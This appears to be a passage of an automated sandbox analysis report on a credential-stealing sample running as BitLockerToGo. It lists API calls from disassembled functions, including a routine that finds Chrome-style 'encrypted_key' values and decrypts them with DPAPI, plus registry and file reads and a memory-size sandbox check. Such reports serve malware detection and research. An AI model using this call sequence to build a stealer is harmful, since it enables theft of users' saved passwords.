                                                                                                                                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2623679115-0
                                                                                                                                                      • Opcode ID: ab2f35484252023c1776400796e0d5bda4d14619bf50da905f36f8ce390e333d
                                                                                                                                                      • Instruction ID: 20d7c510d6d6e909686e829c43d609686ab9ac291a5d91a94da9964403b98565
                                                                                                                                                      • Opcode Fuzzy Hash: ab2f35484252023c1776400796e0d5bda4d14619bf50da905f36f8ce390e333d
                                                                                                                                                      • Instruction Fuzzy Hash: 9A41B6B6D401186BDB25EBA0DC5DFFE733DEB48300F404958AA1956180EA755A98CFE1
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027599EC
                                                                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02759A11
                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02759A31
                                                                                                                                                      • ReadFile.KERNEL32(000000FF,?,00000000,027602E7,00000000), ref: 02759A5A
                                                                                                                                                      • LocalFree.KERNEL32(027602E7), ref: 02759A90
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 02759A9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2311089104-0
                                                                                                                                                      • Opcode ID: 08c69063e46b24982b58a337e86d040ad7d45264188ff9bc5e67452f3a437da9
                                                                                                                                                      • Instruction ID: 89876cbaa34803c3e83393ac560188250284af03ffe1c635385d72cc083d0a01
                                                                                                                                                      • Opcode Fuzzy Hash: 08c69063e46b24982b58a337e86d040ad7d45264188ff9bc5e67452f3a437da9
                                                                                                                                                      • Instruction Fuzzy Hash: BA3138B4E00209EFDB14CFA4C889BAEB7B5FF48354F108158F901A7280D779AA51CFA4
                                                                                                                                                      APIs
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5D28), ref: 027647DB
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764801
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02764820
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02764834
                                                                                                                                                      • lstrcat.KERNEL32(?,029E01A8), ref: 02764847
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 0276485B
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5478), ref: 0276486F
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 02768D90: GetFileAttributesA.KERNEL32(00000000,?,02760117,?,00000000,?,00000000,02770DAB,02770DAA), ref: 02768D9F
                                                                                                                                                        • Part of subcall function 02764570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02764580
                                                                                                                                                        • Part of subcall function 02764570: RtlAllocateHeap.NTDLL(00000000), ref: 02764587
                                                                                                                                                        • Part of subcall function 02764570: wsprintfA.USER32 ref: 027645A6
                                                                                                                                                        • Part of subcall function 02764570: FindFirstFileA.KERNEL32(?,?), ref: 027645BD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2540262943-0
                                                                                                                                                      • Opcode ID: 25ee186b6d2e0405f4a2eeb05c212d563d2c55203ff74a7f253ed17b403a6394
                                                                                                                                                      • Instruction ID: 87814fa384607eb3aa67774922aa71343b871f29c6e6e6db410c5baaf537b4c5
                                                                                                                                                      • Opcode Fuzzy Hash: 25ee186b6d2e0405f4a2eeb05c212d563d2c55203ff74a7f253ed17b403a6394
                                                                                                                                                      • Instruction Fuzzy Hash: 32315EB2940318A7CB15FBB0DC8DEFD737DAB58700F444989AB1996080EA749B898F95
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0275123E
                                                                                                                                                      • __aulldiv.LIBCMT ref: 02751258
                                                                                                                                                      • __aulldiv.LIBCMT ref: 02751266
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 02751294
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 3404098578-2766056989
                                                                                                                                                      • Opcode ID: 00d611d4cf8049e4d1fd86a5e0e6405200244630a98d5f2ccff89e58416a41f9
                                                                                                                                                      • Instruction ID: bac6d6dae1a953ead272c11d634f180a8f307d36692096978ff3a48fac222e16
                                                                                                                                                      • Opcode Fuzzy Hash: 00d611d4cf8049e4d1fd86a5e0e6405200244630a98d5f2ccff89e58416a41f9
                                                                                                                                                      • Instruction Fuzzy Hash: 0E0112B0E44318BAEB10DFE4CC4DBAEB778EB04706F608444EB09B62C0D7B555458F59
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 027599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027599EC
                                                                                                                                                        • Part of subcall function 027599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02759A11
                                                                                                                                                        • Part of subcall function 027599C0: LocalAlloc.KERNEL32(00000040,?), ref: 02759A31
                                                                                                                                                        • Part of subcall function 027599C0: ReadFile.KERNEL32(000000FF,?,00000000,027602E7,00000000), ref: 02759A5A
                                                                                                                                                        • Part of subcall function 027599C0: LocalFree.KERNEL32(027602E7), ref: 02759A90
                                                                                                                                                        • Part of subcall function 027599C0: CloseHandle.KERNEL32(000000FF), ref: 02759A9A
                                                                                                                                                        • Part of subcall function 02768E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02768E52
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 02759D39
                                                                                                                                                        • Part of subcall function 02759AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02754EEE,00000000,00000000), ref: 02759AEF
                                                                                                                                                        • Part of subcall function 02759AC0: LocalAlloc.KERNEL32(00000040,?,?,?,02754EEE,00000000,?), ref: 02759B01
                                                                                                                                                        • Part of subcall function 02759AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02754EEE,00000000,00000000), ref: 02759B2A
                                                                                                                                                        • Part of subcall function 02759AC0: LocalFree.KERNEL32(?,?,?,?,02754EEE,00000000,?), ref: 02759B3F
                                                                                                                                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 02759D92
                                                                                                                                                        • Part of subcall function 02759B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02759B84
                                                                                                                                                        • Part of subcall function 02759B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 02759BA3
                                                                                                                                                        • Part of subcall function 02759B60: memcpy.MSVCRT(?,?,?), ref: 02759BC6
                                                                                                                                                        • Part of subcall function 02759B60: LocalFree.KERNEL32(?), ref: 02759BD3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                      • API String ID: 3731072634-738592651
                                                                                                                                                      • Opcode ID: 73dab84dcd4461a5d769192ef9d8cad04bdf06ceade72eb057a350b6d812915b
                                                                                                                                                      • Instruction ID: 460008154d3684d94ecc3c577995208c616d1e807b713038ae8a63cb4be23566
                                                                                                                                                      • Opcode Fuzzy Hash: 73dab84dcd4461a5d769192ef9d8cad04bdf06ceade72eb057a350b6d812915b
                                                                                                                                                      • Instruction Fuzzy Hash: 9C313BB6D10219EBDF04DFE4DC89AEFB7B9AB48304F144518EE05A7240E770AA14CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C80C947
                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C80C969
                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C80C9A9
                                                                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C80C9C8
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C80C9E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4191843772-0
                                                                                                                                                      • Opcode ID: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                      • Instruction ID: 30e341699e2e63c723fbf29d5a2f39e223cda5f639fb32d69e3c15c830b377e5
                                                                                                                                                      • Opcode Fuzzy Hash: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                      • Instruction Fuzzy Hash: 5721FB317016146BDB355E65DD8CBAE7279AF46708F50092AF90397741E7206840C7F1
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02767E37
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02767E3E
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,029E10E0,00000000,00020119,?), ref: 02767E5E
                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,029E5438,00000000,00000000,000000FF,000000FF), ref: 02767E7F
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 02767E92
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3225020163-0
                                                                                                                                                      • Opcode ID: 59d7f5dace3051dd2daaf0b65378f4b27b48ffd08f91c147c83135c8a0ad729a
                                                                                                                                                      • Instruction ID: 634aef621c4972884f087e19dee2b5055f7cb66968609e69f399a65ae41a1a98
                                                                                                                                                      • Opcode Fuzzy Hash: 59d7f5dace3051dd2daaf0b65378f4b27b48ffd08f91c147c83135c8a0ad729a
                                                                                                                                                      • Instruction Fuzzy Hash: 31118CB1E84205EBD714CFD9D94AFBBBBB8EB04B20F104619FA05A7280D77558048BA0
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 027512B4
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 027512BB
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 027512D7
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 027512F5
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 027512FF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3225020163-0
                                                                                                                                                      • Opcode ID: 8ba97315c56856b39065b62186dfe5f6df3620fbc9a3cbc94b2569f8ccacfc8e
                                                                                                                                                      • Instruction ID: 92a68fe5e9d7ee482d1fda7674626bc7d630941082432f4a2d4060e3afee306f
                                                                                                                                                      • Opcode Fuzzy Hash: 8ba97315c56856b39065b62186dfe5f6df3620fbc9a3cbc94b2569f8ccacfc8e
                                                                                                                                                      • Instruction Fuzzy Hash: D70131B9E44208BBDB00DFE5DC5AFAEB7B8EB48711F008559FA05D7280D6759A118F90
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(029E4968,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,02760153), ref: 0275A0BD
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E55F8,?,?,?,?,?,?,?,?,?,?,?,02760153), ref: 0275A146
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A820: lstrlen.KERNEL32(00000000,?,?,02765B54,02770ADB,02770ADA,?,?,02766B16,00000000,?,029D0578,?,0277110C,?,00000000), ref: 0276A82B
                                                                                                                                                        • Part of subcall function 0276A820: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A885
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
